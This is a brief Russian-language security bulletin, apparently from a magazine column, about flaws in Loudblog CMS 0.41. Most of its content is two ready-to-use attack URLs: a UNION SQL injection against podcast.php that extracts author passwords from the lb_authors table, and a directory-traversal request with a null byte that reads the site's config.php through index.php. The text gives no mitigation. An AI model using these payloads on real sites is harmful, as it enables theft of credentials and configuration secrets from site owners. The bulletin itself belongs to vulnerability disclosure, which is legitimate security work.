Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Loudblog.
Компьютер для продвинутых
пользователей
Содержание:
Loudblog
ПО: Loudblog
Версия: 0.41
О софте:
Loudblog быстрая и легкая в использовании система управления содержанием
сайта (CMS) для работы со страничками в веб.
Использование:
SQL Injection в podcast.php (magic_quotes=off):
http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select
password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
from lb_authors where '1'='1' /*
Чтение локальных файлов (index.php):
http://[target]/loudblog/index.php?template=../../../loudblog/custom/config.php%00